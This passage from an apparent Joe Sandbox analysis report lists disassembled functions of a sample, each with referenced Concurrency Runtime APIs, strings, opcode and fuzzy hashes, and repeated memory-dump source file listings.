                                                                                                      • Opcode Fuzzy Hash: 1351bd237f9a62e0404815f7e63a109d74f97c502a9932a579afc39cc3c2fd6c
                                                                                                      • Instruction Fuzzy Hash: 2F315931D01659DFCB14FFA8D5916EDBBB0FF04718F08406AD481A7642DB716D04CB96
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00892EB7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00892F31
                                                                                                      • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00892F78
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                                                                      • String ID: pContext
                                                                                                      • API String ID: 3390424672-2046700901
                                                                                                      • Opcode ID: 5bdf6d43930f6311c070bb0a625b31e277d04d298e660ab852562138f4685098
                                                                                                      • Instruction ID: b08ea1215bac864399b096d88feab6755119d87f94b407950b3daed6311bca69
                                                                                                      • Opcode Fuzzy Hash: 5bdf6d43930f6311c070bb0a625b31e277d04d298e660ab852562138f4685098
                                                                                                      • Instruction Fuzzy Hash: 8A21B531700A15ABCF29BB28D895AADB3B9FF94324B08011AF511D76D1CF74EC468B92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0088C4F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • List.LIBCONCRT ref: 0088C57A
                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0088C59F
                                                                                                      • Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 0088C5DE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
                                                                                                      • String ID: pExecutionResource
                                                                                                      • API String ID: 1772865662-359481074
                                                                                                      • Opcode ID: c382324970ae04276a15d4dd141014614eb6085dbc26a8fb7def8791d28cab26
                                                                                                      • Instruction ID: 6dde7ef637fc5239af9aa0d055be580498a238c6b2e243002ad652f41eac4dc2
                                                                                                      • Opcode Fuzzy Hash: c382324970ae04276a15d4dd141014614eb6085dbc26a8fb7def8791d28cab26
                                                                                                      • Instruction Fuzzy Hash: 65219371600205ABCF08EFA8C842BADB7B5FF48300F14406DF505EB685DBB4EE058BA6
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00886532 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 008865B4
                                                                                                      • Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 008865F6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CacheGroupLocalSchedule$Concurrency::details::SegmentSegment::std::invalid_argument::invalid_argument
                                                                                                      • String ID: count$ppVirtualProcessorRoots
                                                                                                      • API String ID: 2663199487-3650809737
                                                                                                      • Opcode ID: 979d534248629500317a150ee84c65a75630df0301b726d6f55b27f94d86ac47
                                                                                                      • Instruction ID: 103b931c9a57edf3f469f460dff89d413848ec63ac766c9200ee79b47210acf8
                                                                                                      • Opcode Fuzzy Hash: 979d534248629500317a150ee84c65a75630df0301b726d6f55b27f94d86ac47
                                                                                                      • Instruction Fuzzy Hash: 4021BD34600619AFCB08EF68C891EAD77B1FF08300F044069F50ADB691DB71EA11CB52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0088D005 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0088D09E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                                                                                                      • String ID: RoInitialize$RoUninitialize$combase.dll
                                                                                                      • API String ID: 348560076-3997890769
                                                                                                      • Opcode ID: 06743c52cd1c2598ce153c33d164d3106d502abe49f52457e6221059c066fb28
                                                                                                      • Instruction ID: e7378a2ff01fd09d7c82aaf53432cb0440771e30069cc9cf9e85c76d7c52e4f8
                                                                                                      • Opcode Fuzzy Hash: 06743c52cd1c2598ce153c33d164d3106d502abe49f52457e6221059c066fb28
                                                                                                      • Instruction Fuzzy Hash: 42012D7058571165EB24B7B50C05FBF369CFF41348F205839E580F2281EE34DA0687A1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 008884AC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SafeRWList.LIBCONCRT ref: 00888503
                                                                                                        • Part of subcall function 008864FE: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0088650F
                                                                                                        • Part of subcall function 008864FE: List.LIBCMT ref: 00886519
                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00888515
                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0088853A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
